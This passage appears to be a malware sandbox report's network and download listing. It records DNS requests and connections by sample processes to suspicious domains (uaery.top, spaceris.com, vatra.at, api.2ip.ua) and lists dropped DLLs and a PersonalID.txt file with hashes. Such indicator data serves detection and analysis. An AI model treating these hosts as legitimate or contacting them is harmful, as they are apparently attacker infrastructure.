                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 142.250.179.206:443
                                                                                                                                                                      sb-ssl.google.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      19.0kB
                                                                                                                                                                      8.9kB
                                                                                                                                                                      22
                                                                                                                                                                      17
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 108.156.60.113:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      adwcleaner.exe
                                                                                                                                                                      1.2kB
                                                                                                                                                                      5.0kB
                                                                                                                                                                      9
                                                                                                                                                                      10
                                                                                                                                                                    • 108.156.60.113:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      adwcleaner.exe
                                                                                                                                                                      982 B
                                                                                                                                                                      5.3kB
                                                                                                                                                                      11
                                                                                                                                                                      14
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 23.236.181.126:443
                                                                                                                                                                      https
                                                                                                                                                                      LocalService
                                                                                                                                                                      11.0kB
                                                                                                                                                                      7.0kB
                                                                                                                                                                      27
                                                                                                                                                                      31
                                                                                                                                                                    • 108.156.60.113:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      adwcleaner.exe
                                                                                                                                                                      982 B
                                                                                                                                                                      5.3kB
                                                                                                                                                                      11
                                                                                                                                                                      14
                                                                                                                                                                    • 108.156.60.113:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      adwcleaner.exe
                                                                                                                                                                      20.6kB
                                                                                                                                                                      1.2MB
                                                                                                                                                                      437
                                                                                                                                                                      866
                                                                                                                                                                    • 108.156.60.113:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      1.9kB
                                                                                                                                                                      5.2kB
                                                                                                                                                                      11
                                                                                                                                                                      13
                                                                                                                                                                    • 54.188.37.165:443
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      4.0kB
                                                                                                                                                                      4.5kB
                                                                                                                                                                      15
                                                                                                                                                                      13
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 216.239.32.116:443
                                                                                                                                                                      beacons4.gvt2.com
                                                                                                                                                                      tls
                                                                                                                                                                      2.1kB
                                                                                                                                                                      7.1kB
                                                                                                                                                                      10
                                                                                                                                                                      9
                                                                                                                                                                    • 108.156.60.113:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      1.8kB
                                                                                                                                                                      5.2kB
                                                                                                                                                                      11
                                                                                                                                                                      13
                                                                                                                                                                    • 54.188.37.165:443
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      2.5kB
                                                                                                                                                                      4.4kB
                                                                                                                                                                      12
                                                                                                                                                                      12
                                                                                                                                                                    • 108.156.60.113:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      1.2kB
                                                                                                                                                                      5.0kB
                                                                                                                                                                      9
                                                                                                                                                                      10
                                                                                                                                                                    • 108.156.60.113:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      1.1kB
                                                                                                                                                                      5.0kB
                                                                                                                                                                      8
                                                                                                                                                                      9
                                                                                                                                                                    • 108.156.60.113:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      942 B
                                                                                                                                                                      5.3kB
                                                                                                                                                                      10
                                                                                                                                                                      13
                                                                                                                                                                    • 108.156.60.113:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      942 B
                                                                                                                                                                      5.3kB
                                                                                                                                                                      10
                                                                                                                                                                      13
                                                                                                                                                                    • 108.156.60.113:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      29.5kB
                                                                                                                                                                      1.2MB
                                                                                                                                                                      595
                                                                                                                                                                      867
                                                                                                                                                                    • 108.156.60.113:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      1.5kB
                                                                                                                                                                      5.2kB
                                                                                                                                                                      11
                                                                                                                                                                      13
                                                                                                                                                                    • 54.71.113.68:443
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      1.6kB
                                                                                                                                                                      4.4kB
                                                                                                                                                                      11
                                                                                                                                                                      11
                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      potunulit.org
                                                                                                                                                                      dns
                                                                                                                                                                      59 B
                                                                                                                                                                      91 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      potunulit.org

                                                                                                                                                                      DNS Response

                                                                                                                                                                      188.114.96.0
                                                                                                                                                                      188.114.97.0

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      polyzi.com
                                                                                                                                                                      dns
                                                                                                                                                                      56 B
                                                                                                                                                                      72 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      polyzi.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      95.217.49.230

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      api.2ip.ua
                                                                                                                                                                      dns
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      56 B
                                                                                                                                                                      72 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      api.2ip.ua

                                                                                                                                                                      DNS Response

                                                                                                                                                                      162.0.217.254

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      uaery.top
                                                                                                                                                                      dns
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      55 B
                                                                                                                                                                      215 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      uaery.top

                                                                                                                                                                      DNS Response

                                                                                                                                                                      190.219.54.242
                                                                                                                                                                      58.235.189.192
                                                                                                                                                                      211.171.233.126
                                                                                                                                                                      175.119.10.231
                                                                                                                                                                      213.231.134.136
                                                                                                                                                                      210.182.29.70
                                                                                                                                                                      185.95.186.58
                                                                                                                                                                      187.212.192.17
                                                                                                                                                                      187.170.238.164
                                                                                                                                                                      187.232.159.164

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      spaceris.com
                                                                                                                                                                      dns
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      58 B
                                                                                                                                                                      218 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      spaceris.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      195.158.3.162
                                                                                                                                                                      175.119.10.231
                                                                                                                                                                      211.119.84.111
                                                                                                                                                                      190.147.188.50
                                                                                                                                                                      211.59.14.90
                                                                                                                                                                      95.107.163.44
                                                                                                                                                                      123.140.161.243
                                                                                                                                                                      190.219.54.242
                                                                                                                                                                      58.235.189.192
                                                                                                                                                                      210.182.29.70

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      t.me
                                                                                                                                                                      dns
                                                                                                                                                                      build2.exe
                                                                                                                                                                      50 B
                                                                                                                                                                      66 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      t.me

                                                                                                                                                                      DNS Response

                                                                                                                                                                      149.154.167.99

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      vatra.at
                                                                                                                                                                      dns
                                                                                                                                                                      54 B
                                                                                                                                                                      214 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      vatra.at

                                                                                                                                                                      DNS Response

                                                                                                                                                                      190.147.188.50
                                                                                                                                                                      203.91.116.53
                                                                                                                                                                      190.117.75.91
                                                                                                                                                                      175.120.254.9
                                                                                                                                                                      211.53.230.67
                                                                                                                                                                      187.212.192.17
                                                                                                                                                                      211.119.84.112
                                                                                                                                                                      211.40.39.251
                                                                                                                                                                      211.171.233.126
                                                                                                                                                                      95.107.163.44

                                                                                                                                                                    • 224.0.0.251:5353
                                                                                                                                                                      4.5kB
                                                                                                                                                                      76
                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      clients2.google.com
                                                                                                                                                                      dns
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      65 B
                                                                                                                                                                      105 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      clients2.google.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      172.217.168.238

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      accounts.google.com
                                                                                                                                                                      dns
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      65 B
                                                                                                                                                                      81 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      accounts.google.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      142.251.36.45

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      edgedl.me.gvt1.com
                                                                                                                                                                      dns
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      64 B
                                                                                                                                                                      80 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      edgedl.me.gvt1.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      34.104.35.123

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      apis.google.com
                                                                                                                                                                      dns
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      61 B
                                                                                                                                                                      98 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      apis.google.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      216.58.208.110

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      dns.google
                                                                                                                                                                      dns
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      56 B
                                                                                                                                                                      88 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      dns.google

                                                                                                                                                                      DNS Response

                                                                                                                                                                      8.8.4.4
                                                                                                                                                                      8.8.8.8

                                                                                                                                                                    • 8.8.4.4:443
                                                                                                                                                                      dns.google
                                                                                                                                                                      https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      13.5kB
                                                                                                                                                                      29.2kB
                                                                                                                                                                      78
                                                                                                                                                                      86
                                                                                                                                                                    • 216.58.208.110:443
                                                                                                                                                                      apis.google.com
                                                                                                                                                                      https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      5.9kB
                                                                                                                                                                      47.2kB
                                                                                                                                                                      22
                                                                                                                                                                      35
                                                                                                                                                                    • 142.251.36.14:443
                                                                                                                                                                      https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      6.8kB
                                                                                                                                                                      28.4kB
                                                                                                                                                                      21
                                                                                                                                                                      24
                                                                                                                                                                    • 34.96.102.137:443
                                                                                                                                                                      https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      4.1kB
                                                                                                                                                                      9.3kB
                                                                                                                                                                      12
                                                                                                                                                                      11
                                                                                                                                                                    • 34.96.102.137:443
                                                                                                                                                                      https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      4.7kB
                                                                                                                                                                      50.1kB
                                                                                                                                                                      27
                                                                                                                                                                      43
                                                                                                                                                                    • 142.250.179.202:443
                                                                                                                                                                      https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      3.4kB
                                                                                                                                                                      6.2kB
                                                                                                                                                                      6
                                                                                                                                                                      6
                                                                                                                                                                    • 142.250.27.154:443
                                                                                                                                                                      https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      3.4kB
                                                                                                                                                                      6.0kB
                                                                                                                                                                      6
                                                                                                                                                                      5
                                                                                                                                                                    • 142.250.179.142:443
                                                                                                                                                                      https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      5.8kB
                                                                                                                                                                      8.8kB
                                                                                                                                                                      8
                                                                                                                                                                      9
                                                                                                                                                                    • 8.8.4.4:443
                                                                                                                                                                      dns.google
                                                                                                                                                                      https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.9kB
                                                                                                                                                                      5.5kB
                                                                                                                                                                      4
                                                                                                                                                                      4
                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      edgedl.me.gvt1.com
                                                                                                                                                                      dns
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      64 B
                                                                                                                                                                      80 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      edgedl.me.gvt1.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      34.104.35.123

                                                                                                                                                                    • 8.8.4.4:443
                                                                                                                                                                      dns.google
                                                                                                                                                                      https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      4.1kB
                                                                                                                                                                      7.3kB
                                                                                                                                                                      20
                                                                                                                                                                      19
                                                                                                                                                                    • 142.250.179.142:443
                                                                                                                                                                      https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.4kB
                                                                                                                                                                      1.8kB
                                                                                                                                                                      4
                                                                                                                                                                      3
                                                                                                                                                                    • 142.250.27.156:443
                                                                                                                                                                      https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.2kB
                                                                                                                                                                      2.9kB
                                                                                                                                                                      7
                                                                                                                                                                      5
                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      www.virustotal.com
                                                                                                                                                                      dns
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      64 B
                                                                                                                                                                      133 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      www.virustotal.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      74.125.34.46

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      lh5.googleusercontent.com
                                                                                                                                                                      dns
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      71 B
                                                                                                                                                                      116 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      lh5.googleusercontent.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      142.251.36.1

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      encrypted-tbn0.gstatic.com
                                                                                                                                                                      dns
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      72 B
                                                                                                                                                                      88 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      encrypted-tbn0.gstatic.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      142.251.36.14

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      id.google.com
                                                                                                                                                                      dns
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      59 B
                                                                                                                                                                      75 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      id.google.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      142.251.36.3

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      i.ytimg.com
                                                                                                                                                                      dns
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      57 B
                                                                                                                                                                      217 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      i.ytimg.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      142.251.39.118
                                                                                                                                                                      172.217.168.214
                                                                                                                                                                      216.58.208.118
                                                                                                                                                                      216.58.214.22
                                                                                                                                                                      142.250.179.150
                                                                                                                                                                      142.251.36.54
                                                                                                                                                                      172.217.168.246
                                                                                                                                                                      142.250.179.182
                                                                                                                                                                      142.250.179.214
                                                                                                                                                                      142.251.36.22

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      play.google.com
                                                                                                                                                                      dns
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      61 B
                                                                                                                                                                      77 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      play.google.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      142.251.36.14

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de
                                                                                                                                                                      dns
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      156 B
                                                                                                                                                                      188 B
                                                                                                                                                                      2
                                                                                                                                                                      2

                                                                                                                                                                      DNS Request

                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de

                                                                                                                                                                      DNS Request

                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de

                                                                                                                                                                      DNS Response

                                                                                                                                                                      129.233.182.56

                                                                                                                                                                      DNS Response

                                                                                                                                                                      129.233.182.56

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      googleads.g.doubleclick.net
                                                                                                                                                                      dns
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      146 B
                                                                                                                                                                      178 B
                                                                                                                                                                      2
                                                                                                                                                                      2

                                                                                                                                                                      DNS Request

                                                                                                                                                                      googleads.g.doubleclick.net

                                                                                                                                                                      DNS Request

                                                                                                                                                                      googleads.g.doubleclick.net

                                                                                                                                                                      DNS Response

                                                                                                                                                                      142.250.179.162

                                                                                                                                                                      DNS Response

                                                                                                                                                                      142.250.179.162

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      static.doubleclick.net
                                                                                                                                                                      dns
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      68 B
                                                                                                                                                                      84 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      static.doubleclick.net

                                                                                                                                                                      DNS Response

                                                                                                                                                                      142.251.36.6

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      dns
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      134 B
                                                                                                                                                                      406 B
                                                                                                                                                                      2
                                                                                                                                                                      2

                                                                                                                                                                      DNS Request

                                                                                                                                                                      jnn-pa.googleapis.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      142.250.179.170
                                                                                                                                                                      142.250.179.202
                                                                                                                                                                      142.251.36.10
                                                                                                                                                                      142.251.39.106
                                                                                                                                                                      172.217.168.202
                                                                                                                                                                      216.58.214.10
                                                                                                                                                                      142.250.179.138
                                                                                                                                                                      142.251.36.42

                                                                                                                                                                      DNS Request

                                                                                                                                                                      jnn-pa.googleapis.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      142.251.36.10
                                                                                                                                                                      142.251.39.106
                                                                                                                                                                      172.217.168.202
                                                                                                                                                                      216.58.208.106
                                                                                                                                                                      216.58.214.10
                                                                                                                                                                      142.250.179.138
                                                                                                                                                                      142.251.36.42
                                                                                                                                                                      142.250.179.170
                                                                                                                                                                      142.250.179.202

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      dns
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      77 B
                                                                                                                                                                      237 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      content-autofill.googleapis.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      142.251.36.42
                                                                                                                                                                      172.217.168.234
                                                                                                                                                                      142.250.179.170
                                                                                                                                                                      142.250.179.202
                                                                                                                                                                      142.251.36.10
                                                                                                                                                                      142.251.39.106
                                                                                                                                                                      172.217.168.202
                                                                                                                                                                      216.58.208.106
                                                                                                                                                                      216.58.214.10
                                                                                                                                                                      142.250.179.138

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      malwarology.substack.com
                                                                                                                                                                      dns
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      140 B
                                                                                                                                                                      204 B
                                                                                                                                                                      2
                                                                                                                                                                      2

                                                                                                                                                                      DNS Request

                                                                                                                                                                      malwarology.substack.com

                                                                                                                                                                      DNS Request

                                                                                                                                                                      malwarology.substack.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      104.18.33.245
                                                                                                                                                                      172.64.154.11

                                                                                                                                                                      DNS Response

                                                                                                                                                                      104.18.33.245
                                                                                                                                                                      172.64.154.11

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      substackcdn.com
                                                                                                                                                                      dns
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      122 B
                                                                                                                                                                      250 B
                                                                                                                                                                      2
                                                                                                                                                                      2

                                                                                                                                                                      DNS Request

                                                                                                                                                                      substackcdn.com

                                                                                                                                                                      DNS Request

                                                                                                                                                                      substackcdn.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      65.9.86.11
                                                                                                                                                                      65.9.86.66
                                                                                                                                                                      65.9.86.107
                                                                                                                                                                      65.9.86.91

                                                                                                                                                                      DNS Response

                                                                                                                                                                      65.9.86.66
                                                                                                                                                                      65.9.86.11
                                                                                                                                                                      65.9.86.91
                                                                                                                                                                      65.9.86.107

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      js.sentry-cdn.com
                                                                                                                                                                      dns
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      63 B
                                                                                                                                                                      127 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      js.sentry-cdn.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      151.101.66.217
                                                                                                                                                                      151.101.130.217
                                                                                                                                                                      151.101.194.217
                                                                                                                                                                      151.101.2.217

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com
                                                                                                                                                                      dns
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      109 B
                                                                                                                                                                      287 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      52.217.44.212
                                                                                                                                                                      52.216.170.123
                                                                                                                                                                      52.216.241.68
                                                                                                                                                                      3.5.3.165
                                                                                                                                                                      52.216.92.83
                                                                                                                                                                      54.231.200.169
                                                                                                                                                                      52.217.199.57
                                                                                                                                                                      52.216.40.241

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      update.googleapis.com
                                                                                                                                                                      dns
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      67 B
                                                                                                                                                                      83 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      update.googleapis.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      142.250.179.163

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      beacons.gcp.gvt2.com
                                                                                                                                                                      dns
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      66 B
                                                                                                                                                                      112 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      beacons.gcp.gvt2.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      216.58.208.99

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      sb-ssl.google.com
                                                                                                                                                                      dns
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      126 B
                                                                                                                                                                      204 B
                                                                                                                                                                      2
                                                                                                                                                                      2

                                                                                                                                                                      DNS Request

                                                                                                                                                                      sb-ssl.google.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      142.250.179.206

                                                                                                                                                                      DNS Request

                                                                                                                                                                      sb-ssl.google.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      142.250.179.206

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      dns
                                                                                                                                                                      adwcleaner.exe
                                                                                                                                                                      146 B
                                                                                                                                                                      274 B
                                                                                                                                                                      2
                                                                                                                                                                      2

                                                                                                                                                                      DNS Request

                                                                                                                                                                      adwcleaner.malwarebytes.com

                                                                                                                                                                      DNS Request

                                                                                                                                                                      adwcleaner.malwarebytes.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      108.156.60.113
                                                                                                                                                                      108.156.60.74
                                                                                                                                                                      108.156.60.91
                                                                                                                                                                      108.156.60.54

                                                                                                                                                                      DNS Response

                                                                                                                                                                      108.156.60.74
                                                                                                                                                                      108.156.60.113
                                                                                                                                                                      108.156.60.54
                                                                                                                                                                      108.156.60.91

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      dns
                                                                                                                                                                      144 B
                                                                                                                                                                      554 B
                                                                                                                                                                      2
                                                                                                                                                                      2

                                                                                                                                                                      DNS Request

                                                                                                                                                                      telemetry.malwarebytes.com

                                                                                                                                                                      DNS Request

                                                                                                                                                                      telemetry.malwarebytes.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      54.188.37.165
                                                                                                                                                                      54.71.113.68
                                                                                                                                                                      34.216.1.172
                                                                                                                                                                      52.39.83.8
                                                                                                                                                                      34.217.225.174
                                                                                                                                                                      54.191.242.132
                                                                                                                                                                      44.239.99.67
                                                                                                                                                                      35.81.98.93

                                                                                                                                                                      DNS Response

                                                                                                                                                                      35.167.190.17
                                                                                                                                                                      44.228.10.218
                                                                                                                                                                      35.81.98.93
                                                                                                                                                                      44.225.144.144
                                                                                                                                                                      54.71.113.68
                                                                                                                                                                      54.188.37.165
                                                                                                                                                                      52.39.83.8
                                                                                                                                                                      35.167.135.90

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      beacons4.gvt2.com
                                                                                                                                                                      dns
                                                                                                                                                                      126 B
                                                                                                                                                                      158 B
                                                                                                                                                                      2
                                                                                                                                                                      2

                                                                                                                                                                      DNS Request

                                                                                                                                                                      beacons4.gvt2.com

                                                                                                                                                                      DNS Request

                                                                                                                                                                      beacons4.gvt2.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      216.239.32.116

                                                                                                                                                                      DNS Response

                                                                                                                                                                      216.239.32.116

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      dns
                                                                                                                                                                      144 B
                                                                                                                                                                      554 B
                                                                                                                                                                      2
                                                                                                                                                                      2

                                                                                                                                                                      DNS Request

                                                                                                                                                                      telemetry.malwarebytes.com

                                                                                                                                                                      DNS Request

                                                                                                                                                                      telemetry.malwarebytes.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      54.71.113.68
                                                                                                                                                                      44.228.10.218
                                                                                                                                                                      34.217.225.174
                                                                                                                                                                      35.81.98.93
                                                                                                                                                                      35.161.212.132
                                                                                                                                                                      34.210.132.209
                                                                                                                                                                      44.239.99.67
                                                                                                                                                                      35.167.135.90

                                                                                                                                                                      DNS Response

                                                                                                                                                                      44.228.10.218
                                                                                                                                                                      54.191.242.132
                                                                                                                                                                      54.200.228.111
                                                                                                                                                                      35.81.98.93
                                                                                                                                                                      54.71.113.68
                                                                                                                                                                      35.167.135.90
                                                                                                                                                                      34.210.132.209
                                                                                                                                                                      54.188.37.165

                                                                                                                                                                    MITRE ATT&CK Enterprise v6

                                                                                                                                                                    Replay Monitor

                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                    Downloads

                                                                                                                                                                    • C:\ProgramData\mozglue.dll

                                                                                                                                                                      Filesize

                                                                                                                                                                      133KB

                                                                                                                                                                      MD5

                                                                                                                                                                      8f73c08a9660691143661bf7332c3c27

                                                                                                                                                                      SHA1

                                                                                                                                                                      37fa65dd737c50fda710fdbde89e51374d0c204a

                                                                                                                                                                      SHA256

                                                                                                                                                                      3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

                                                                                                                                                                      SHA512

                                                                                                                                                                      0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

                                                                                                                                                                    • C:\ProgramData\nss3.dll

                                                                                                                                                                      Filesize

                                                                                                                                                                      1.2MB

                                                                                                                                                                      MD5

                                                                                                                                                                      bfac4e3c5908856ba17d41edcd455a51

                                                                                                                                                                      SHA1

                                                                                                                                                                      8eec7e888767aa9e4cca8ff246eb2aacb9170428

                                                                                                                                                                      SHA256

                                                                                                                                                                      e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                                                                                                                                                                      SHA512

                                                                                                                                                                      2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                                                                                                                                                                    • C:\SystemID\PersonalID.txt

                                                                                                                                                                      Filesize

